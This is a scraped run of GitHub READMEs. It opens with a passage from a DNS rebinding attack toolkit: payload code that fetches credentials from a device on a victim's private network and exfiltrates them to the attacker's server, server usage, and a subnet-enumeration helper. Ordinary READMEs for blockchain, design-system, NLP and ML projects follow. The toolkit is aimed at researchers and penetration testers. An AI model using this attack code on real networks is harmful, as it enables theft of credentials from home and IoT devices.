now that we ve rebound the host and are communicating with the target service let s grab the credentials const creds await fetch http location host auth json then res res json username crashoverride password hacktheplanet console log creds great now let s exfiltrate those creds to the node js server running this whole shebang that s the last thing we care about so we will just return this promise as the result of attack and let its handler s deal with it note the second argument to exfiltrate must be
json serializable return dnsrebindnode exfiltrate auth example creds catch err return promise reject err script body html server js this script is used to deliver the launcher html and payload html files as well as receive and save exfiltrated data from the dnsrebindnode to the data folder for development i usually run this server on localhost and point dnsrebindattack attack towards 127 0 0 1 for production i run the server on a vps cloud server and point dnsrebindattack attack to its public ip address bash run with admin privileges so that it can open port 80 sudo node server usage server h v p port dns rebind toolkit server optional arguments h help show this help message and exit v version show program s version number and exit p port port port which ports to bind the servers on may include multiple like port 80 port 1337 default p 80 p 8008 p 8060 p 1337 more examples i ve included an example vulnerable server in examples vulnerable server js this vulnerable service must be run from another machine on your network as its port must match the same port as server js to run this example attack yourself do the following secondary computer bash clone the repo git clone https github com brannondorsey dns rebind toolkit cd dns rebind toolkit launch the vulnerable server node examples vulnerable server vulnerable server is listening on 3000 primary computer node server port 3000 now navigate your browser to http localhost 3000 launcher html and open a dev console wait a minute or two if the attack worked you should see some dumped credz from the vulnerable server running on the secondary computer check out the examples and payloads directories for more examples files and directories server js the dns rebind toolkit server payloads several html payload files hand crafted to target a few vulnerable iot devices includes attacks against google home roku and radio thermostat for now i would love to see more payloads added to this repo in the future prs welcome examples
example usage files data directory where data exfiltrated by dnsrebindnode exfiltrate is saved share directory of javascript files shared by multiple html files in examples and payload this toolkit was developed to be a useful tool for researchers and penetration testers if you d like to see some of the research that led to its creation check out this post https medium com brannondorsey attacking private networks from the internet with dns rebinding ea7098a2d325 if you write a payload for another service consider making a pr to this repository so that others can benefit from your work
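The subnet brute force at the heart of the toolkit (leak the local IP via WebRTC, keep the first three octets, then target every address in the implied /24) is easy to reason about on its own. Below is a minimal Python sketch of just that enumeration step, purely illustrative; the toolkit itself does this in browser-side JavaScript inside launcher.html:

```python
def candidate_targets(local_ip):
    """Expand a leaked local IP (e.g. obtained via a WebRTC leak) into
    every address on the implied /24 subnet, mirroring the toolkit's
    brute force of 192.168.1.0-255."""
    first3 = local_ip.rsplit(".", 1)[0]           # "192.168.1.36" -> "192.168.1"
    return ["%s.%d" % (first3, octet) for octet in range(256)]

targets = candidate_targets("192.168.1.36")
# one payload iframe would be injected per candidate address
print(len(targets))                # 256
print(targets[0], targets[-1])     # 192.168.1.0 192.168.1.255
```

The victim's own address is included in the sweep, which is harmless: the rebind attempt against a host that isn't running the targeted service simply fails.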
dns-rebinding dns hacking red-team network-attacks iot iot-security
front_end
hive
hive decentralizing the exchange of ideas and information hive https files peakd com file peakd hive netuoso jmhldwmv horizontal png hive is a graphene based social blockchain that was created as a fork of steem and born on the core idea of decentralization originally hive was announced on the steem blockchain https peakd com communityfork hiveio announcing the launch of hive blockchain prior to the initial token airdrop hive did not have any ico or mining period the hive blockchain removes the elements of centralization and imbalanced control that plagued the steem blockchain since its launch on march 20 2020 hive is growing and evolving day by day hive s prime selling points are its decentralization 3 second transaction speed and ability to handle large volumes it is ideal real estate for a variety of innovative projects focused on a broad range of fields from open source development to games hive serves as the operational home for all kinds of projects companies and applications having a highly active and passionate community hive has become a thriving atmosphere for new and experienced developers to quickly bootstrap their applications on top of this hive is extremely rewarding to content creators and curators alike the technical development of the hive blockchain itself is carried out by the founding decentralized group of over 30 open source developers many of whom were instrumental in creating steem back in 2016 and supported by a growing community of additional open source developers and witnesses documents developer portal https developers hive io advantages hive fund truly decentralized community free transactions resource credits freemium model fast block confirmations 3 seconds time delay security vested hive savings hierarchical role based permissions keys integrated token allocation lowest entry barrier for user adoption in the market dozens of dapps already built on hive and many more to come technical details currency symbol hive hbd hive s very
own stable coin with a two way peg delegated proof of stake consensus dpos 10 apr inflation narrowing to 1 apr over 20 years 65 of inflation to authors curators 15 of inflation to stakeholders 10 of inflation to block producers 10 of inflation to hive fund installation getting started with hive is fairly simple you can either choose to use pre built docker images build with docker manually or build from source directly all steps have been documented and while many different os are supported the easiest one is ubuntu 22 04 lts quickstart just want to get up and running quickly we have pre built docker images for your convenience more details are in our quickstart guide doc exchangequickstart md building we strongly recommend using one of the pre built docker images or using docker to build hive both of these processes are described in the quickstart guide doc exchangequickstart md but if you would still like to build from source we also have build instructions doc building md for linux ubuntu lts dockerized deployment building a hived docker image is described here building under docker doc building md building under docker if you d like to use our already pre built official binary images it s as simple as downloading it from the dockerhub registry with only one command docker pull hiveio hive a script is available that wraps a docker run statement and emulates direct hived usage run hived img sh scripts run hived img sh this script is the recommended way to launch the hived docker container general usage run hived img sh docker img option value hived option read more about using run hived img sh doc run hived img md in various scenarios cli wallet we provide a basic cli wallet for interfacing with hived the wallet is self documented via command line help the node you connect to via the cli wallet needs to be running the account by key api condenser api database api account history api wallet bridge api plugins and needs to be configured to accept websocket 
connections via webserver ws endpoint the cli wallet offers two operating modes interactive mode commands are entered on an interactive command line daemon mode wallet commands are sent via rpc calls in daemon mode it is important to specify which ip addresses are allowed to establish connections to the wallet s http server see rpc http endpoint daemon rpc http allowip options for details to prepare transactions you need to execute a few setup steps in the cli wallet use set password password call to establish a password protecting your wallet from unauthorized access use unlock password to turn on full operation mode in the wallet import private key s using import key wif key command keys and password are stored in the wallet json file testing see doc devs testing md doc devs testing md for testing build targets and info on how to use lcov to check code coverage of tests configuration config file run hived once to generate a data directory and a config file the default data directory location is hived kill hived if you want to modify the config to your liking we have example config contrib config for docker ini used in the docker image all options will be present in the default config file and there may be more options that need to be changed from the docker configs some of the options actually used in images are configured via command line seed nodes a list of some seed nodes to get you started can be found in doc seednodes txt doc seednodes txt this same file is baked into the docker images and can be overridden by setting hived seed nodes in the container environment at docker run time to a whitespace delimited list of seed nodes with port system requirements running a hive consensus node requires the following hardware resources data directory to hold a blockchain file s 550gb of disk storage is required storage to hold a shared memory file 30gb of memory is required at the moment to store state data no support no warranty the software is provided as is 
without warranty of any kind express or implied including but not limited to the warranties of merchantability fitness for a particular purpose and noninfringement in no event shall the authors or copyright holders be liable for any claim damages or other liability whether in an action of contract tort or otherwise arising from out of or in connection with the software or the use or other dealings in the software
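The inflation split listed under technical details (65% of inflation to authors/curators, 15% to stakeholders, 10% to block producers, 10% to the Hive Fund) is simple to sanity-check with a few lines of arithmetic. This is an illustrative sketch only, not how the chain computes rewards internally:

```python
def allocate_inflation(new_hive):
    """Split a quantity of newly minted HIVE per the documented schedule:
    65% authors/curators, 15% stakeholders, 10% block producers,
    10% Hive Fund. Purely illustrative arithmetic."""
    shares = {
        "authors_curators": 0.65,
        "stakeholders": 0.15,
        "block_producers": 0.10,
        "hive_fund": 0.10,
    }
    # round to avoid float noise in this toy calculation
    return {name: round(new_hive * share, 3) for name, share in shares.items()}

split = allocate_inflation(1000.0)
print(split["authors_curators"])   # 650.0
print(sum(split.values()))         # 1000.0
```

The shares sum to 100%, so every newly minted token is accounted for; note that the overall inflation *rate* itself narrows from roughly 10% APR toward 1% APR over 20 years, which this sketch does not model.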
hive blockchain decentralization dapps platform openhive p2p cryptocurrency web3
blockchain
helsinki-design-system
h1 align center helsinki design system h1 div align center strong design system for the city of helsinki strong div div align center helsinki design system hds is an open source design system built by the city of helsinki it consists of tools for development and design as well as resources and guidelines for creating user friendly accessible solutions for the city div br div align center version a href https github com city of helsinki helsinki design system releases latest img src https img shields io github v release city of helsinki helsinki design system label version style flat square alt version a licence a href https github com city of helsinki helsinki design system blob master license img src https img shields io github license city of helsinki helsinki design system style flat square alt licence mit a div div align center h4 a href http hds hel fi hds documentation a span span a href https hds hel fi components available components a span span a href https hds hel fi storybook react react storybook a span span a href https hds hel fi storybook core core storybook a span span a href https hds hel fi getting started contributing how to contribute contributing a h4 div features accessibility baked in all hds components are designed from the ground up to be as accessible as possible components go through a third party accessibility audit before release react css components are available both as react and css styles choose the one which suits best for your project customizable hds components are designed to be customizable to allow expressing the vibrant helsinki brand design and implementation in sync designers use a collection of sketch libraries which are perfectly in sync with the implementation packages hds is divided into three 3 separate packages npm https img shields io npm v hds core label hds core style flat square https www npmjs com package hds core helsinki city brand colors typography and base styles as css styles and variables npm https img 
shields io npm v hds react label hds react style flat square https www npmjs com package hds react provides hds components implemented using react npm https img shields io npm v hds design tokens label hds design tokens style flat square https www npmjs com package hds design tokens basis of the hds which includes base colors typography etc as design tokens getting started wrench are you a developer if yes start by checking out hds for developers page https hds hel fi getting started developer br art are you a designer if yes start by checking out hds for designers page https hds hel fi getting started designer helsinki design system uses lerna https lerna js org for running scripts across the repo as well as versioning and creating releases of the packages yarn workspaces https yarnpkg com lang en docs workspaces is used to manage dependencies this allows the separate packages to reference each other via symlinks during local development using the packages in your project see the package specific instructions on how to get started using the packages hds design tokens packages design tokens readme md getting started hds core packages core readme md getting started hds react packages react readme md getting started setting up local development environment start setting up your local development by going through the steps in the development guide development md contributing before contributing it is recommended to read hds contribution before contributing page https hds hel fi getting started contributing how to contribute we are accepting new features feature requests and help with improving the documentation there are multiple ways you can contribute opening issues https github com city of helsinki helsinki design system issues about bugs improvements new features etc opening pull requests https github com city of helsinki helsinki design system pulls with changes fixes new features etc opening branches in abstract to propose new component designs or design changes 
more information about design contribution can be found in hds contribution design page https hds hel fi getting started contributing design take part in discussions and comment on new hds features the easiest way to do this is to browse open issues https github com city of helsinki helsinki design system issues and pull requests https github com city of helsinki helsinki design system pulls and leave a comment if you have access to the city of helsinki slack you may also join the discussion there more info about the ways to contact us can be found in hds about support page https hds hel fi about
design-system design-systems css sass react
os
Klue_InforTechTutorials
klue infortechtutorials information technology tutoring system
server
NLP101
nlp 101 a resource repository for deep learning and natural language processing this document is drafted for those who have enthusiasm for deep learning in natural language processing if there are any good recommendations or suggestions i will try to add more this document is drafted with the rules as follows materials that are considered to cover the same grounds will not be recorded repeatedly only one among those within similar level of difficulty will be recorded materials with different level of difficulty that need prerequisite or additional learning will be recorded language korean readme kr md english readme md br mathematics statistics and probabilities source description statistics 110 https www youtube com playlist list pl2sou6wwxb0uwwh80ktq6ht66kwxbztio a lecture on probability that can be easily understood by non engineering major students brandon foltz s statistics https www youtube com user bcfoltz playlists brandon foltz s probability and statistics lectures are posted on youtube and are rather short so they can be easily accessed during a daily commute br linear algebra source description essence of linear algebra https www youtube com playlist list plzhqobowtqdpd3mizzm2xvfitgf8he ab a linear algebra lecture on the youtube channel 3blue1brown could be a big help for those planning to take undergraduate level linear algebra since it allows overall understanding it provides intuitively understandable visual aids to getting the picture of linear algebra linear algebra https www youtube com watch v zk3o402wf1c list ple7ddd91010bc51f8 a legendary lecture of professor gilbert strang matrix methods in data analysis and machine learning https www youtube com watch v cx5z oslnwe list plul4u3cngp63omnuhxqiucrks2pivhn3k professor gilbert strang s lecture on applied linear algebra as linear algebra is prerequisite knowledge here it is quite difficult to understand yet a great lecture to learn how linear algebra is actually applied in the field of machine learning br
basic mathematics overview source description essence of calculus https www youtube com playlist list plzhqobowtqdmsr9k rj53dwvrmyo3t5yr a calculus lecture by the channel 3blue1brown mentioned above helpful for those who want an overview of calculus likewise calculus https ocw mit edu ans7870 resources strang edited calculus calculus pdf a coursebook on calculus written by professor gilbert strang there is no need to go through the whole book but chapters 2 4 11 13 15 16 are very worth studying mathematics for machine learning https mml book github io a book on all the mathematical knowledge accompanied with machine learning mathematical knowledge within the collegiate level of natural sciences or engineering is preferable here as the explanations are mainly broad brush br deep learning and natural language processing deep learning source description cs230 https www youtube com results search query cs230 a deep learning lecture of the renowned professor andrew ng who has recently founded a startup on ai education deep learning book https www deeplearningbook org a book written by ian goodfellow the father of gan and other renowned professors dive into deep learning https d2l ai while the deep learning book above has theoretical explanation this book also includes the code to check how the notion is actually implemented grokking deep learning https www manning com books grokking deep learning teaches readers how to write basic elements of the neural network with numpy without using deep learning frameworks also a good material to study how high level apis work under the hood br natural language processing source description neural network methods for nlp https www morganclaypool com doi abs 10 2200 s00762ed1v01y201703hlt037 an nlp book using deep learning written by yoav goldberg it has witty explanations that lead to the fundamentals eisenstein s nlp note https github com jacobeisenstein gt nlp class blob master notes eisenstein nlp notes pdf awesome book to read
that deals with not only nlp with machine learning but also the basic linguistic knowledge to understand it eisenstein s book introduction to natural language processing https www amazon com introduction language processing adaptive computation dp 0262042843 was published based on this note cs224n https www youtube com watch v 8rxd5 xhemo list ploromvodv4rohcuxmzknm7j3fvwbby42z awesome nlp lecture from stanford it has the 2019 version dealing with the latest trends cs224u https www youtube com watch v tz jrc nrjy list ploromvodv4robpmcir6rnnulfan56js20 an nlp lecture that was re evaluated since the advent of the glue benchmark recommended to be taken after cs224n and its merit is that it provides exercises in pytorch code first intro to natural language processing https www youtube com playlist list pltmwhnx gukkocxqokqjuvxglsdywssh9 a code first nlp lecture by rachel thomas the co founder of fast ai the motivation that rachel thomas gives is mind blowing natural language processing with pytorch https www amazon com natural language processing pytorch applications dp 1491978236 an nlp book from o reilly known for numerous data science books of great quality it is pytorch friendly as all the code is written in pytorch linguistic fundamentals for natural language processing https www amazon com linguistic fundamentals natural language processing dp 1627050116 a linguistics book written by the linguist emily bender known for the bender rule although not deep learning related it is a great beginner s book on linguistic domain knowledge br libraries related to natural language processing source description numpy http cs231n github io python numpy tutorial stanford s lecture cs231n deals with numpy which is fundamental in machine learning calculations tensorflow https www tensorflow org tutorials text word embeddings a tutorial provided by tensorflow it gives great explanations on the basics with visual aids pytorch https pytorch org tutorials an awesome tutorial on pytorch
provided by facebook with great quality tensor2tensor https github com tensorflow tensor2tensor sequence to sequence toolkit by google written in tensorflow fairseq https github com pytorch fairseq sequence to sequence toolkit by facebook written in pytorch hugging face transformers https github com huggingface transformers a library based on transformer provided by hugging face that allows easy access to pre trained models one of the key nlp libraries not only for developers but for researchers as well hugging face tokenizers https github com huggingface tokenizers a tokenizer library that hugging face maintains it boasts fast operations as the key functions are written in rust the latest tokenizers such as bpe can be tried out with hugging face tokenizers spacy https course spacy io a tutorial written by ines the core developer of the noteworthy spacy torchtext https mlexplained com 2018 02 08 a comprehensive tutorial to torchtext a tutorial on torchtext a package that makes data preprocessing handy has more details than the official documentation sentencepiece https github com google sentencepiece google s open source library that builds bpe based vocabulary using subword information br useful materials the big bad nlp database https quantumstat com dataset dataset html br awesome blogs blog article you should read christopher olah s blog https colah github io understanding lstm networks https colah github io posts 2015 08 understanding lstms jay alammar s blog http jalammar github io illustrated word2vec http jalammar github io illustrated word2vec sebastian ruder s blog http ruder io tracking progress in natural language processing https nlpprogress com chris mccormick s blog http mccormickml com word2vec tutorial the skip gram model http mccormickml com 2016 04 19 word2vec tutorial the skip gram model the gradient https thegradient pub evaluation metrics for language modeling https thegradient pub understanding evaluation metrics for language models distill pub
https distill pub visualizing memorization in rnns https distill pub 2019 memorization in rnns thomas wolf s blog https medium com thomwolf the current best of universal word embeddings and sentence embeddings https medium com huggingface universal word sentence embeddings ce48ddc8fc3a dair ai https medium com dair ai a light introduction to transfer learning for nlp https medium com dair ai a light introduction to transfer learning for nlp 3e2cb56b48c8 machine learning mastery https machinelearningmastery com how to develop a neural machine translation system from scratch https machinelearningmastery com develop neural machine translation system keras br nlp specialists you should remember not enumerated by rank name description known for kyunghyun cho professor nyu gru https arxiv org abs 1406 1078 yejin choi professor washington univ grover https arxiv org abs 1905 12616 yoon kim ph d candidate harvard univ cnn for nlp https www aclweb org anthology d14 1181 minjoon seo researcher clova ai allen ai bidaf https arxiv org abs 1611 01603 kyubyong park researcher kakao brain paper implementation nlp with korean language https github com kyubyong tomas mikolov researcher fair word2vec https papers nips cc paper 5021 distributed representations of words and phrases and their compositionality pdf omer levy researcher fair various word embedding techniques https scholar google co il citations user pzvd2h8aaaaj hl en jason weston researcher fair memory networks https arxiv org abs 1410 3916 yinhan liu researcher fair roberta https arxiv org pdf 1907 11692 pdf guillaume lample researcher fair xlm https arxiv org pdf 1901 07291 pdf alexis conneau researcher fair xlm r https arxiv org abs 1901 07291 mike lewis researcher fair bart https arxiv org abs 1910 13461 ashish vaswani researcher google transformer https arxiv org abs 1706 03762 jacob devlin researcher google bert https arxiv org abs 1810 04805 kenton lee researcher google e2e coref https arxiv org abs 1707 07045
matthew peters researcher allen ai elmo https arxiv org abs 1802 05365 alec radford researcher open ai gpt 2 https d4mucfpksywv cloudfront net better language models language models are unsupervised multitask learners pdf sebastian ruder researcher deepmind nlp progress https nlpprogress com richard socher researcher salesforce glove https www aclweb org anthology d14 1162 jeremy howard co founder fast ai ulmfit https arxiv org abs 1801 06146 thomas wolf lead engineer hugging face pytorch transformers https github com huggingface pytorch transformers luke zettlemoyer professor washington univ elmo https arxiv org abs 1802 05365 yoav goldberg professor bar ilan univ neural net methods for nlp https www morganclaypool com doi abs 10 2200 s00762ed1v01y201703hlt037 chris manning professor stanford univ cs224n https www youtube com watch v 8rxd5 xhemo list ploromvodv4rohcuxmzknm7j3fvwbby42z dan jurafsky professor stanford univ speech and language processing https web stanford edu jurafsky slp3 graham neubig professor cmu neural nets for nlp https www youtube com watch v pmcxgntuhnk list pl8pytp1v4i8ajj7sy6sdtmjgkt7eo2vms sam bowman professor nyu nli benchmark https nlp stanford edu pubs snli paper pdf nikita kitaev ph d candidate uc berkeley reformer https arxiv org abs 2001 04451 zihang dai ph d candidate cmu transformer xl https arxiv org abs 1901 02860 zhilin yang ph d candidate cmu xlnet https arxiv org abs 1906 08237 abigail see ph d candidate stanford univ pointer generator http www abigailsee com 2017 04 16 taming rnns for better summarization html kevin clark ph d candidate stanford univ electra https arxiv org abs 2003 10555 eric wallace ph d candidate berkeley univ allennlp interpret https arxiv org abs 1909 09251 br research conferences acl https www aclweb org portal aaai http www aaai org conll https www conll org coling https dblp org db conf coling index emnlp https www aclweb org anthology venues emnlp eurnlp https www eurnlp org iclr https www iclr cc
icml https icml cc ijcai https www ijcai org naacl https www aclweb org anthology venues naacl neurips https nips cc
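The libraries listed above (hugging face tokenizers, sentencepiece) build BPE-based subword vocabularies. A minimal sketch of a single byte-pair-encoding merge step in Python; the function names and toy corpus are illustrative, not taken from either library:

```python
from collections import Counter

def most_frequent_pair(tokens):
    """Count adjacent symbol pairs across all words and return the most frequent one."""
    pairs = Counter()
    for word in tokens:
        for a, b in zip(word, word[1:]):
            pairs[(a, b)] += 1
    return max(pairs, key=pairs.get)

def merge_pair(tokens, pair):
    """Replace every occurrence of the pair with a single merged symbol."""
    merged = []
    for word in tokens:
        out, i = [], 0
        while i < len(word):
            if i + 1 < len(word) and (word[i], word[i + 1]) == pair:
                out.append(word[i] + word[i + 1])
                i += 2
            else:
                out.append(word[i])
                i += 1
        merged.append(out)
    return merged

# each word starts as a list of characters; real BPE repeats this loop
# until the vocabulary reaches a target size
corpus = [list("lower"), list("lowest"), list("low")]
pair = most_frequent_pair(corpus)
corpus = merge_pair(corpus, pair)
```

Repeating the merge step many times yields the subword vocabulary; production tokenizers add frequency-weighted counts, byte-level alphabets, and fast implementations (in rust, in the case of hugging face tokenizers).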
deep-learning natural-language-processing awesome-list mathematics
ai
embeddedObjectExtractor
embeddedobjectextractor an information extraction system designed to extract embedded objects such as tables from pdf documents
os
blockchain_go
blockchain in go a blockchain implementation in go as described in these articles 1 basic prototype https jeiwan net posts building blockchain in go part 1 2 proof of work https jeiwan net posts building blockchain in go part 2 3 persistence and cli https jeiwan net posts building blockchain in go part 3 4 transactions 1 https jeiwan net posts building blockchain in go part 4 5 addresses https jeiwan net posts building blockchain in go part 5 6 transactions 2 https jeiwan net posts building blockchain in go part 6 7 network https jeiwan net posts building blockchain in go part 7
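The proof-of-work step described in part 2 can be sketched in a few lines; the repo itself is in Go, so this Python version is for illustration only, and the difficulty constant and byte layout are assumptions rather than the repo's actual code:

```python
import hashlib

DIFFICULTY = 16  # hypothetical: require 16 leading zero bits in the hash

def proof_of_work(block_data: bytes):
    """Increment a nonce until sha256(data + nonce) falls below the target,
    i.e. has at least DIFFICULTY leading zero bits."""
    target = 1 << (256 - DIFFICULTY)
    nonce = 0
    while True:
        digest = hashlib.sha256(block_data + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce, digest.hex()
        nonce += 1

nonce, block_hash = proof_of_work(b"genesis")
```

Verification is the cheap direction: anyone can recompute the single hash for the returned nonce and check it against the target, which is what makes the scheme usable for consensus.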
golang blockchain bitcoin cryptocurrency
blockchain
xmanager
xmanager a framework for managing machine learning experiments note that links in readme md have to be absolute as it also lands on pypi xmanager is a platform for packaging running and keeping track of machine learning experiments it currently enables one to launch experiments locally or on google cloud platform gcp https cloud google com interaction with experiments is done via xmanager s apis through python launch scripts check out these slides https storage googleapis com gresearch xmanager deepmind xmanager slides pdf for a more detailed introduction to get started install xmanager and its prerequisites if needed and follow the tutorial writing xmanager launch scripts or a codelab colab notebook https colab research google com github deepmind xmanager blob master colab codelab ipynb jupyter notebook https github com deepmind xmanager blob main jupyter codelab ipynb to create and run a launch script see contributing md https github com deepmind xmanager blob main contributing md for guidance on contributions install xmanager bash pip install git https github com deepmind xmanager git or alternatively a pypi project https pypi org project xmanager is also available bash pip install xmanager on debian based systems xmanager and all its dependencies can be installed and set up by cloning this repository and then running sh cd xmanager setup scripts chmod x setup all sh setup all sh prerequisites the codebase assumes python 3 9 install docker optional if you use xmanager xm pythondocker to run xmanager experiments you need to install docker 1 follow the steps https docs docker com engine install supported platforms to install docker 2 and if you are a linux user follow the steps https docs docker com engine install linux postinstall to enable sudoless docker install bazel optional if you use xmanager xm local bazelcontainer or xmanager xm local bazelbinary to run xmanager experiments you need to install bazel 1 follow the steps https docs
bazel build versions master install html to install bazel create a gcp project optional if you use xm local vertex vertex ai https cloud google com vertex ai to run xmanager experiments you need to have a gcp project in order to be able to access vertex ai to run jobs 1 create https console cloud google com a gcp project 2 install https cloud google com sdk docs install gcloud 3 associate your google account gmail account with your gcp project by running bash export gcp project gcp project id gcloud auth login gcloud auth application default login gcloud config set project gcp project 4 set up gcloud to work with docker by running bash gcloud auth configure docker 5 enable google cloud platform apis enable https console cloud google com apis library iam googleapis com iam enable https console cloud google com apis library aiplatform googleapis com the cloud ai platform enable https console cloud google com apis library containerregistry googleapis com the container registry 6 create a staging bucket in us central1 if you do not already have one this bucket should be used to save experiment artifacts like tensorflow log files which can be read by tensorboard this bucket may also be used to stage files to build your docker image if you build your images remotely bash export google cloud bucket name google cloud bucket name gsutil mb l us central1 gs google cloud bucket name add google cloud bucket name to the environment variables or your bashrc bash export google cloud bucket name google cloud bucket name writing xmanager launch scripts details summary a snippet for the impatient summary python contains core primitives and apis from xmanager import xm implementation of those core concepts for what we call the local backend which means all executables are sent for execution from this machine independently of whether they are actually executed on our machine or on gcp from xmanager import xm local creates an experiment context and saves its metadata to the database
which we can reuse later via xm local list experiments for example note that experiment has tracking properties such as id with xm local create experiment experiment title cifar10 as experiment packaging prepares a given executable spec for running with a concrete executor spec depending on the combination that may involve building steps and or copying the results somewhere for example a xm python container designed to run on kubernetes will be built via docker build and the new image will be uploaded to the container registry but for our simple case where we have a prebuilt linux binary designed to run locally only some validations are performed for example that the file exists executable contains all the necessary information needed to launch the packaged blob via add see below executable experiment package xm binary what we are going to run path home user project a out where we are going to run it executor spec xm local local spec let s find out which batch size is best presumably our jobs write the results somewhere for batch size in 64 1024 add creates a new experiment unit which is usually a collection of semantically united jobs and sends them for execution to pass an actual collection one may want to use jobgroup s more about it later in the documentation but for our purposes we are going to pass just one job experiment add xm job the a out we packaged earlier executable executable we are using the default settings here but executors have plenty of arguments available to control execution executor xm local local time to pass the batch size as a command line argument args batch size batch size we can also pass environment variables env vars heapprofile tmp a out hprof the context will wait for locally run things but not for remote things such as jobs sent to gcp although they can be explicitly awaited via wait for completion details the basic structure of an xmanager launch script can be summarized by these steps 1 create an experiment and acquire its 
context python from xmanager import xm from xmanager import xm local with xm local create experiment experiment title cifar10 as experiment 2 define specifications of executables you want to run python spec xm pythoncontainer path path to python folder entrypoint xm modulename cifar10 3 package your executables python executable experiment package xm packageable executable spec spec executor spec xm local vertex spec 4 define your hyperparameters python import itertools batch sizes 64 1024 learning rates 0 1 0 001 trials list dict batch size bs learning rate lr for bs lr in itertools product batch sizes learning rates 5 define resource requirements for each job python requirements xm jobrequirements t4 1 6 for each trial add a job job groups to launch them python for hyperparameters in trials experiment add xm job executable executable executor xm local vertex requirements requirements args hyperparameters now we should be ready to run run xmanager the launch script to learn more about different executables and executors follow components components run xmanager bash xmanager launch xmanager examples cifar10 tensorflow launcher py in order to run multi job experiments the xm wrap late bindings flag might be required bash xmanager launch xmanager examples cifar10 tensorflow launcher py xm wrap late bindings todo elaborate on why that is necessary components executable specifications xmanager executable specifications define what should be packaged in the form of binaries source files and other input dependencies required for job execution executable specifications are reusable and generally platform independent see executable specs md https github com deepmind xmanager blob main docs executable specs md for details on each executable specification name description xmanager xm container a pre built tar image xmanager xm bazelcontainer a bazel https bazel build target producing a tar image xmanager xm binary a pre built binary xmanager xm bazelbinary a bazel https 
bazel build target producing a self contained binary xmanager xm pythoncontainer a directory with python modules to be packaged as a docker container executors xmanager executors define a platform where the job runs and resource requirements for the job each executor also has a specification which describes how an executable specification should be prepared and packaged see executors md https github com deepmind xmanager blob main docs executors md for details on each executor name description xmanager xm local local runs a binary or a container locally xmanager xm local vertex runs a container on vertex ai create a gcp project optional xmanager xm local kubernetes runs a container on kubernetes job jobgroup a job represents a single executable on a particular executor while a jobgroup unites a group of job s providing a gang scheduling concept job s inside them are scheduled descheduled simultaneously same job and jobgroup instances can be add ed multiple times job a job accepts an executable and an executor along with hyperparameters which can either be command line arguments or environment variables command line arguments can be passed in list form arg1 arg2 arg3 bash binary arg1 arg2 arg3 they can also be passed in dictionary form key1 value1 key2 value2 bash binary key1 value1 key2 value2 environment variables are always passed in dict str str form bash export key value jobs are defined like this python executable xm package executor xm local vertex xm job executable executable executor executor args batch size 64 env vars nccl debug info jobgroup a jobgroup accepts jobs in a kwargs form the keyword can be any valid python identifier for example you can call your jobs agent and observer python agent job xm job observer job xm job xm jobgroup agent agent job observer observer job
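The two argument forms described above (list form and dict form) map onto command lines as shown in the bash snippets. A tiny helper, which is hypothetical and not part of xmanager's API, makes the convention concrete:

```python
def build_argv(binary, args):
    """Render list-form args positionally and dict-form args as --key=value flags.
    Illustrative only; mirrors the arg conventions described in the readme."""
    if isinstance(args, dict):
        rendered = [f"--{key}={value}" for key, value in args.items()]
    else:
        rendered = [str(a) for a in args]
    return [binary] + rendered

build_argv("./binary", ["arg1", "arg2", "arg3"])  # ['./binary', 'arg1', 'arg2', 'arg3']
build_argv("./binary", {"batch_size": 64})        # ['./binary', '--batch_size=64']
```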
ai
bootloader
bootloader bootloader design for mcus in embedded systems
os
CovIndia-Website
coronavisualizer netlify status https api netlify com api v1 badges c6d65259 b62e 4e78 ac63 81b6df831fd4 deploy status https app netlify com sites covindia deploys covindia s website deployed on netlify
districtwise tracker coronavirus covid19 covid19-live-tracker covid19-india coronavirus-tracking coronavirus-real-time
front_end
Machine-Learning-Algorithms-from-Scratch
machine learning algorithms from scratch implementing machine learning algorithms from scratch algorithms implemented so far 1 simple linear regression dataset stock data from quandl 2 logistic regression dataset stanford ml course dataset 3 naive bayes classifier dataset email spam non span 4 decision trees 5 k nearest neighbours k nearest neighbours in parallel dataset chronic kidney disease data from uci 6 a star algorithm 7 k means clustering k means clustering in parallel dataset ipl player stats norm data 8 support vector machine
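The first algorithm above, simple linear regression, has a closed-form from-scratch solution via least squares. A sketch using plain Python lists rather than the quandl stock data used in the repo:

```python
def fit_simple_linear_regression(xs, ys):
    """Return (slope, intercept) minimizing squared error:
    slope = cov(x, y) / var(x), intercept = mean(y) - slope * mean(x)."""
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var = sum((x - mean_x) ** 2 for x in xs)
    slope = cov / var
    intercept = mean_y - slope * mean_x
    return slope, intercept

m, b = fit_simple_linear_regression([1, 2, 3, 4], [3, 5, 7, 9])  # data on y = 2x + 1
```

The other listed algorithms (logistic regression, naive bayes, k-nearest neighbours, k-means) follow the same spirit: implement the update or decision rule directly instead of calling a library.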
machine-learning machine-learning-algorithms machine-learning-python machine-learning-scratch supervised-learning unsupervised-learning
ai
Bootstrap-Pencil-Stencils
bootstrap pencil stencils no longer actively developed other commitments and the fact i no longer use pencil mean this repo is no longer being actively developed pull requests with new features fixes are still welcome as are new issues but my responses might not be the speediest ui components from the bootstrap front end framework as a pencil stencil collection see 1 issues 1 for a full list of included components requests contributions welcome check out my other stencil collections for pencil at nathanielw github io pencil stencils http nathanielw github io pencil stencils example mockup made with the collection misc preview png some of the included components see 1 issues 1 for a full list installation 1 download the zip for the latest release https github com nathanielw bootstrap pencil stencils releases latest make sure you grab the bootstrap pencil stencils vx x x zip file not the source code zip 2 in pencil install the zip via tools install new collection updating right click on the collection in pencil s sidebar and choose uninstall this collection before repeating the installation steps notes a lot of the elements provide variations which can be accessed by right clicking on the element once it s on the canvas license released under the mit license see license for full text a link back here is appreciated when sharing mockups images created with this collection but not required
front_end
step-up-it
step up to information technology step up to information technology is a newly designed nine week program for women interested in the field of it focusing on front end web development skills such as coding and programming http vtworksforwomen org suit this is the content for the course website and uses jekyll http jekyllrb com as a static site generator and github pages https pages github com for hosting
server
graphml-tutorials
